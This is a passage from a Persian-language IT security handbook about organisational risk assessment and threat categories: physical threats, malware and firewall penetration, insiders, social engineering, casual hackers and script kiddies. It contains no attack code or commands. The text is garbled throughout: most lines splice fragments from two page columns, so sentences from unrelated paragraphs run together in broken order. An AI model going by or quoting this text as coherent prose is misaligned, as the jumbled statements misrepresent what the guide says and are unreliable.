‫ﭼﻨﺪ ﭘﺎﺳﺦ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺳﻌﻲ ﻛﻨﻴﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻭﻟﻮﻳـﺖﺑﻨـﺪﻱ‬ ‫ﺩﻫﺔ ‪ ۱۹۹۰‬ﺑﻪ ﺑﻌﺪ ﺣﻤـﻼﺕ ﺷـﺪﻳﺪ ﺑـﺴﻴﺎﺭﻱ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺩﻧﻴـﺎ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﺻﻮﺭﺕ ﭘﺬﻳﺮﻓﺖ )ﻧﻈﻴﺮ ﺣﻤﻠﻪ ﺑﻪ ﻣﺮﻛﺰ ﺗﺠﺎﺭﺕ ﺟﻬـﺎﻧﻲ ﺩﺭ ﺳـﺎﻝ ‪.(۲۰۰۱‬‬
‫ﻼ‬
‫ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﭼﻨﻴﻦ ﺭﺧﺪﺍﺩﻫﺎﻳﻲ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﺍﻣﻨﻴـﺖ ﻓﻴﺰﻳﻜـﻲ ﻛـﺎﻣ ﹰ‬
‫ﻣﻨﺎﺑﻊ ﺍﺻﻠﻲ ﺩﺭﺁﻣﺪ ﻭ ﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﻛﺪﺍﻣﻨﺪ؟‬ ‫‪.۲‬‬
‫ﺭﻭﺷﻦ ﺷﺪ‪ :‬ﺿﺮﻭﺭﺕ ﺣﻀﻮﺭ ﭘﻠﻴﺲ ﺩﺭ ﺍﻃﺮﺍﻑ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ‪ ،‬ﻛﻨﺘﺮﻝ‬
‫ﺳﺎﺧﺘﺎﺭ ﺳـﺎﺯﻣﺎﻥ ﭼﮕﻮﻧـﻪ ﺍﺳـﺖ؟ ﺑﺨـﺸﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﻭ‬ ‫‪.۳‬‬ ‫ﻭﺭﻭﺩ ﺑﻪ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ‪ ،‬ﻃﺮﺍﺣﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺻـﺤﻴﺢ ﺑـﺮﺍﻱ ﺗﺨﻠﻴـﺔ‬
‫ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﺻﻠﻲ ﻫﺮﻳﻚ ﻛﺪﺍﻣﻨﺪ؟ ﺍﻳﻦ ﺑﺨﺸﻬﺎ ﭼﮕﻮﻧﻪ‬ ‫ﻣﺤﻴﻂ ﺩﺭﺻﻮﺭﺕ ﻭﻗـﻮﻉ ﺣﺎﺩﺛـﻪ‪ ،‬ﻭ ﺗﻮﺳـﻌﻪ ﺩﺍﺩﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ‬
‫ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨـﺪ؛ ﭼﮕﻮﻧـﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ‬ ‫ﻣﻄﻤﺌﻦﺗﺮ ﺑﺎ ﻣﻘﺎﻣﺎﺕ ﻣﺤﻠﻲ ﻭ ﻛﺸﻮﺭﻱ‪.‬‬
‫ﻣﻲﻧﻤﺎﻳﻨﺪ؛ ﻭ ﭼﮕﻮﻧﻪ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣﺠﻤﻮﻋـﺔ ﻭﺍﺣـﺪ ﺑـﻪ‬
‫ﺩﺭ ﻗﺴﻤﺖ ﻓﻨﻲ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻇﺮ ﺑﺮﺭﺳﻲ ﺗﻬﺪﻳـﺪﻫﺎﻳﻲ ﻛـﻪ ﺍﺯ‬
‫ﻓﻌﺎﻟﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ؟‬
‫ﺩﺍﺧﻞ ﻭ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﻣﺘﻮﺟﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺩﻱ‪ ،‬ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ‪ ،‬ﻭ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﮔﺮﻭﻫﻬﺎ ﺭﺍ ﺑﻪ ﻫﻢ‬

‫‪53‬‬ ‫‪Risk Evaluation‬‬


‫‪55‬‬ ‫‪Intellectual Property‬‬ ‫‪54‬‬ ‫‪Loss Analysis‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٣٨‬‬

‫ﺗﻬﺪﻳﺪﺍﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‬ ‫ﻛﺪﺍﻡ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻫﺮ ﺑﺨﺶ ﺣﺴﺎﺳﺘﺮ ﺍﺳﺖ ﻭ ﺍﺯ ﭼـﻪ‬ ‫‪.۴‬‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻭ ﺗﻮﺯﻳﻊ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺧﺎﺭﺝ‬
‫ﻧﻔﻮﺫ ﺑﻪ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ؛‬ ‫•‬
‫ﻭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؟‬
‫ﺑﺮﺍﻓﺰﺍﺭﻫﺎ )ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﺗﺮﺍﻭﺍﻫﺎ‪ ،‬ﻛﺮﻣﻬﺎ(؛‬ ‫•‬
‫ﺍﻧﺘﺸﺎﺭ ﻏﻴﺮﻣﺠﺎﺯ ﻳﺎ ﺗﺨﺮﻳﺐ ﺩﺍﺩﻩﻫﺎ؛ ﻭ‬ ‫•‬ ‫ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﺷـﺮﻛﺎ ﻭ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺳـﺎﺯﻣﺎﻥ ﭼـﻪ ﻛـﺴﺎﻧﻲ‬ ‫‪.۵‬‬
‫ﺟﺎﺳﻮﺳﻲ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺑﻮﺳﻴﻠﺔ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ‪.‬‬ ‫•‬ ‫ﻫﺴﺘﻨﺪ ﻭ ﻧﺤﻮﺓ ﺗﻌﺎﻣﻞ ﺁﻧﻬﺎ ﺑﺎ ﺳﺎﺯﻣﺎﻥ ﭼﮕﻮﻧﻪ ﺍﺳﺖ؟‬
‫ﺍﺯ ﻣﻮﺿﻊ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻧﺴﺎﻧﻲ‪ ،‬ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﻋﻮﺍﻣﻞ ﺧﺮﺍﺑﻜﺎﺭ ﺩﺍﺧﻠـﻲ‬ ‫ﺍﻃﻼﻋﺎﺕ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺮﺍﻱ ﭘﺎﺳـﺦ ﺩﺍﺩﻥ ﺑـﻪ ﺍﻳـﻦ ﺳـﺆﺍﻻﺕ ﺭﺍ‬
‫ﻭ ﺧﺎﺭﺟﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﺩﺍﺧﻠﻲ‬ ‫ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﮔﻔﺘﮕﻮ ﺑﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ )ﺑﺨﺼﻮﺹ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ ﻓﻨـﺎﻭﺭﻱ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻧﺎﺷﻲ ﺍﺯ ﺧﻄﺎﻱ ﺍﻧﺴﺎﻧﻲ ﺑﺎﺷﺪ‪ :‬ﻳﻚ ﺳﻬﻞﺍﻧﮕﺎﺭﻱ ﺳﺎﺩﻩ‪،‬‬ ‫ﺍﻃﻼﻋﺎﺕ(‪ ،‬ﻣﺪﻳﺮﺍﻥ ﻭ ﻫﻴﺄﺕ ﻣﺪﻳﺮﻩ ﺷﺮﻛﺖ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ .‬ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﺑﻲﺗﻮﺟﻬﻲ‪ ،‬ﻳﺎ ﻋﺪﻡ ﺁﻣﻮﺯﺵ ﻛﺎﻓﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ‪ .‬ﺩﺭ ﺣﻮﺯﻩﻫﺎﻱ ﺩﻳﮕﺮ‬ ‫ﻧﻈﺮﺍﺕ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﻣﻮﺭﺩ ﻣﺴﺎﺋﻞ ﺩﻳﮕـﺮ ﻣﻤﻜـﻦ‬
‫ﺑﺨــﺼﻮﺹ ﺟﺎﺳﻮﺳــﻲ ﺳــﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ‪ ،‬ﻣــﻲﺗــﻮﺍﻥ ﺍﺯ ﻣﻬﻨﺪﺳــﻲ‬ ‫ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻛﺸﻒ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳـﺪ ﺷـﻮﺩ‪ .‬ﺩﺳـﺖ ﺁﺧـﺮ‬
‫ﺍﺟﺘﻤﺎﻋﻲ‪ ٥٦‬ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﺴﻬﻴﻼﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﻭ‬ ‫ﺍﻳﻨﻜﻪ ﺗﻴﻤﻲ ﻛﻪ ﺑﻪ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﭘـﺮﺩﺍﺯﺩ ﺑﺎﻳـﺪ ﺑـﺎ‬
‫ﻣﺤﺮﻣﺎﻧﺔ ﺍﻓﺮﺍﺩ ﺁﮔﺎﻩ ﺩﺍﺧﻞ ﺷﺮﻛﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ‪ .‬ﻣﺠﻤﻮﻋـﻪﺍﻱ‬ ‫ﺍﺩﺑﻴﺎﺕ ﮔﺰﺍﺭﺷﺎﺕ ﺭﺳﺎﻧﻪﻫﺎ ﺩﺭ ﻣﻮﺭﺩ ﺷﺮﻛﺖ ﺁﺷﻨﺎ ﺑﺎﺷـﺪ‪ .‬ﻧﻈـﺮﺍﺕ‬
‫ﻣﻨﺎﺳﺐ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺑﺨـﺶ ﺍﻣﻨﻴـﺖ ﻭ ﺑـﺎ ﻫﻤﻜـﺎﺭﻱ‬ ‫ﻋﻤﻮﻣﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣـﺆﺛﺮ ﺑﺎﺷـﺪ؛ ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﺷـﺮﻛﺖ ﺩﺭ‬
‫ﺑﺨﺶ ﭘﺮﺳﻨﻠﻲ ﺍﻳﺠﺎﺩ ﺷﻮﻧﺪ ﺗﺎ ﺑﻪ ﻛﺎﻫﺶ ﺧﻄﺮﺍﺕ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﺻﻨﻌﺘﻲ ﺑﺤﺚﺍﻧﮕﻴﺰ ﻳﺎ ﺩﺭ ﺟﺎﻳﮕﺎﻫﻲ ﺣﺴﺎﺱ ﻓﻌﺎﻟﻴﺖ ﻛﻨـﺪ‪ ،‬ﻭ ﻳـﺎ‬
‫ﺑﺨﺸﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﺮﺳﻨﻠﻲ ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺭﻭﺍﻟﻬـﺎﻱ‬ ‫ﮔﺰﺍﺭﺷﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺩﺭ ﻧﺸﺮﻳﺎﺕ ﻇـﺎﻫﺮ ﺷـﺪﻩ‬
‫ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺍﺧﺮﺍﺝ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﮔﺮﭼـﻪ‬ ‫ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺍﻧﮕﻴﺰﺓ ﺷﻔﺎﻓﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ‬
‫ﻳﺎﻓﺖ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﻳﻨﮕﻮﻧﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨـﺮﺏ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬ ‫ﺩﺷﻤﻦ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ‪:‬‬
‫ﻧﻴﺎﺯ ﺑﻪ ﺗﻮﺿﻴﺢ ﻣﻔﺼﻞ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺳﺘﻪﺑﻨﺪﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺑﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‬ ‫ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ‬
‫ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ ﭼﻨﺪﺍﻥ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﻧﻴـﺴﺖ‪ ،‬ﻭﻟـﻲ ﺑـﻪ ﻫـﺮ ﺗﺮﺗﻴـﺐ‬
‫ﺯﻣﺎﻧﻴﻜــﻪ ﺷــﺮﻛﺖ ﺳــﺎﺧﺘﺎﺭ ﻭ ﻋﻤﻠﻜــﺮﺩ ﺧــﻮﺩ ﺭﺍ ﺍﺭﺯﻳــﺎﺑﻲ ﻛــﺮﺩ‪،‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻣﻮﺭﺩ ﺷﺪﺕ ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﻣﺘﻨﺎﻇﺮﹰﺍ ﺁﺳﻴﺐ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ‬
‫ﻣﻮﻗﻌﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺷﺮﺣﻲ ﺍﺯ ﻧﻘـﺎﻁ ﺑـﺎﻟﻘﻮﺓ ﻗـﻮﺕ ﻭ‬
‫ﻫﺮ ﺗﻬﺪﻳﺪ ﺑﺼﻮﺭﺕ ﻛﻠﻲ ﺑﺤﺚ ﻛﺮﺩ‪.‬‬
‫ﺿﻌﻒ ﺍﻣﻨﻴﺘﻲ ﺁﻥ ﺑﺪﺳـﺖ ﻣـﻲﺁﻳـﺪ‪ .‬ﺩﺭ ﺍﺑﺘـﺪﺍ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺭﻭﻱ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ‪) ٥٧‬ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﺎﺑﺴﺘﺎﻧﻲ‪ ،(٥٨‬ﻛﺎﺭﻣﻨﺪﺍﻥ ﻳﻚ‬ ‫ﺗﻬﺪﻳــﺪﺍﺕ ﻛﻠــﻲ ﻣﺘﻤﺮﻛــﺰ ﺷــﻮﻳﻢ‪ .‬ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺍﻳــﻦ ﺗﻬﺪﻳــﺪﺍﺕ‬
‫ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷـﺒﻜﻪ ﺁﺷـﻨﺎﻳﻲ ﺩﺍﺭﻧـﺪ‪ .‬ﺍﻳـﻦ‬ ‫ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪﻧﺪ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﺳﻄﺢ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ ﺩﺭ‬
‫ﻻ ﻗـﺼﺪ ﺗﺨﺮﻳـﺐ ﺩﺍﺩﻩﻫـﺎ ﻭ ﺩﺍﺭﺍﺋﻴﻬـﺎﻱ ﺷـﺮﻛﺖ ﺭﺍ‬ ‫ﺍﻓﺮﺍﺩ ﻣﻌﻤـﻮ ﹰ‬ ‫ﻓﻌﺎﻟﻴـﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺗﻬﺪﻳﺪﻫﺎ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺧﻮﺍﻫﺪ‬
‫ﻧﺪﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺍﺯ ﺭﻭﻱ ﻛﻨﺠﻜﺎﻭﻱ ﺳﻌﻲ ﻣﻲﻛﻨﻨـﺪ ﺑـﻪ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ‬ ‫ﺑﻮﺩ‪.‬‬
‫ﻣﺠﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺴﺘﻨﺪ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻛﻠﻲ ﻫﺮ ﺷﺮﻛﺖ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺳﻤﻲ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﻼ ﺑﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫ ﺁﺷﻨﺎ ﻧﺒﺎﺷﻨﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳـﺖ‬ ‫ﺷﺎﻳﺪ ﻛﺎﻣ ﹰ‬
‫ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺎﻋﺚ ﺗﺨﺮﻳﺐ ﺳﻴﺴﺘﻤﻬﺎ ﺷﻮﻧﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺍﮔـﺮ‬ ‫ﺗﻬﺪﻳﺪﺍﺕ ﻓﻴﺰﻳﻜﻲ‬
‫ﺍﺑﺰﺍﺭﻫﺎ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ‪ download‬ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ‬
‫ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ )ﺁﺗﺶﺳﻮﺯﻱ‪ ،‬ﺯﻟﺰﻟﻪ‪ ،‬ﻃﻮﻓﺎﻧﻬﺎﻱ ﺷﺪﻳﺪ ﻭ ﺳﻴﻞ(؛‬ ‫•‬
‫ﺩﺭﺏ ﻣﺨﻔــﻲ‪ ٥٩‬ﻳــﺎ ﺗــﺮﺍﻭﺍ‪ ٦٠‬ﺑﺎﺷــﻨﺪ ﻛــﻪ ﻣــﻮﺭﺩ ﺍﺳــﺘﻔﺎﺩﻩ ﺩﻳﮕــﺮ‬
‫ﺩﺯﺩﻱ؛‬ ‫•‬
‫ﻣﻬﺎﺟﻤﻴﻦ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﻟﺬﺍ ﻧﻔﻮﺫ ﺗﻔﻨﻨـﻲ ﻳـﻚ ﺗﻬﺪﻳـﺪ ﺑـﺰﺭﮒ‬
‫ﺗﺨﺮﻳﺐ؛‬ ‫•‬
‫ﺗﺪﺍﺧﻠﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ؛‬ ‫•‬
‫ﺗﺨﺮﻳﺐ ﺷﺒﻜﻪ؛ ﻭ‬ ‫•‬
‫‪56‬‬ ‫‪Social Engineering‬‬
‫ﺟﺎﺳﻮﺳﻲ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ‪.‬‬ ‫•‬
‫‪57‬‬ ‫‪Casual Hackers‬‬
‫‪58‬‬ ‫‪Summertime Hackers‬‬
‫‪59‬‬ ‫‪Backdoor‬‬
‫‪60‬‬ ‫‪Trojan‬‬
‫‪١٣٩‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﻪ ﻋﻠﺖ ﺳﻄﺢ ﺩﺳﺘﺮﺳﻲﺷﺎﻥ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ‪،‬‬ ‫ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ ﻭ ﻣﻬﻤﺘﺮﻳﻦ ﺩﻟﻴﻞ ﻣﻤﻨﻮﻉ ﺑﻮﺩﻥ ﺁﻥ ﻧﻴﺰ ﻫﻤﻴﻦ‬
‫ﺍﺯ ﻟﺤﺎﻅ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﻧﮕﺮﺍﻧﻲ ﺟﺪﻱ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ‪.‬‬ ‫ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﺩﺳﺘﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ‪ ،‬ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﺑﻪ ﻋﻠﺖ ﺧـﺴﺘﮕﻲ‬ ‫ﻻ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺟـﻮﺍﻧﺘﺮ )ﺩﺭ ﺳـﻦ‬
‫"‪"Script Kiddie‬ﻫـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﺯ ﻛﺎﺭ ﻳﺎ ﺟﺬﺍﺑﻴﺘﻬﺎﻱ ﺭﻗﺎﺑﺖ ﻓﻨﻲ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻧﻔـﻮﺫ ﻣـﻲﻛﻨﻨـﺪ‪.‬‬ ‫ﺩﺑﻴﺮﺳﺘﺎﻥ ﻳﺎ ﭘﻴﺶﺩﺍﻧﺸﮕﺎﻫﻲ( ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧـﻮﺏ‬
‫ﮔﺮﻭﻫﻲ ﺩﻳﮕﺮ ﺑﺪﻧﺒﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺗﺮﻓﻴـﻊ ﻭ ﺩﺳـﺘﻤﺰﺩ‬ ‫ﻭ ﺍﻭﻗﺎﺕ ﺑﻴﻜﺎﺭﻱ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﭼﻨﺪﺍﻥ ﺧﺒﺮﻩ ﻧﻴﺴﺘﻨﺪ ﻭ ﺑـﺮﺍﻱ‬
‫ﻫﻤﻜﺎﺭﺍﻥ ﻳﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﻫـﺴﺘﻨﺪ‪ .‬ﺑﻌـﻀﻲ ﺩﻳﮕـﺮ ﻣﻤﻜـﻦ‬ ‫ﺍﻧﺠﺎﻡ ﻧﻔﻮﺫ ﺍﺯ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﺗﻼﻓﻲ ﺟﻮﻳﺎﻧﻪ ﻋﻠﻴﻪ ﺳﺎﺯﻣﺎﻥ ﺑـﻪ ﺍﻳـﻦ‬ ‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻓﺮﺍﺩ ﺍﻳﻦ ﺩﺳﺘﻪ ﻣﺎﻧﻨﺪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻫﺪﻓﺪﺍﺭ )ﻛﻪ‬
‫ﻋﻤﻞ ﺩﺳﺖ ﺑﺰﻧﻨﺪ؛ ﻳﺎ ﺑﺎﻋﺚ ﺗﻬﺪﻳـﺪﺍﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪﺍﻱ ﺷـﻮﻧﺪ ﻛـﻪ‬ ‫ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤـﻴﻦ ﻣﻄﻠـﺐ ﺑﺮﺭﺳـﻲ ﺷـﺪﻩ(‪ ،‬ﺑـﺮ ﺭﻭﻱ ﺗﺨﺮﻳـﺐ ﻣﺘﻤﺮﻛـﺰ‬
‫ﻋﻠﺖ ﺁﻥ ﻋﺪﻡ ﺣﻔﺎﻇﺖ ﺻﺤﻴﺢ ﺍﺯ ﺳﻴﺴﺘﻢ ﺑﻪ ﻋﻠﺖ ﺁﻣﻮﺯﺵ ﻓﻨﻲ‬ ‫ﻧﻤﻲﺷﻮﻧﺪ ﺍﻣﺎ ﺗﻌﺪﺍﺩ ﺁﻧﻬﺎ ﺯﻳﺎﺩ ﺍﺳﺖ ﻭ ﮔﺎﻫﻲ ﺑﻪ ﺻﻮﺭﺕ ﺗﻴﻤﻲ ﻛﺎﺭ‬
‫ﻧﺎﻗﺺ ﻳﺎ ﺑﻲﺩﻗﺘﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﺷﺪ‪.‬‬ ‫ﻣﻲﻛﻨﻨﺪ ﻭ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻦ ﻗﺎﻟـﺐ ﺗﻬﺪﻳـﺪ ﺑﺰﺭﮔﺘـﺮﻱ ﺑـﻪ ﺣـﺴﺎﺏ‬
‫ﻫﺮﻳــﻚ ﺍﺯ ﺍﻳــﻦ ﺗﻬﺪﻳــﺪﺍﺕ ﺑــﺎﻟﻘﻮﺓ ﺍﻧــﺴﺎﻧﻲ ﺑــﺮﺍﻱ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ‬ ‫ﻣﻲﺁﻳﻨﺪ‪"Script Kiddie" .‬ﻫﺎ ﻧﻔﻮﺫ ﻣﻮﻓﻖ ﺧـﻮﺩ ﺭﺍ ﻣﻨﺘـﺸﺮ ﻭ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺳﻄﺢ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ ﻭ‬ ‫ﻲ‬
‫ﺁﻥ ﻃﺮﻳﻖ ﺍﺩﻋﺎﻱ ﺷﻬﺮﺕ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺩﺭ ﻭﺍﻗـﻊ ﺁﻧﻬـﺎ ﺑـﻪ ﺑـﺪﻧﺎﻣ ﹺ‬
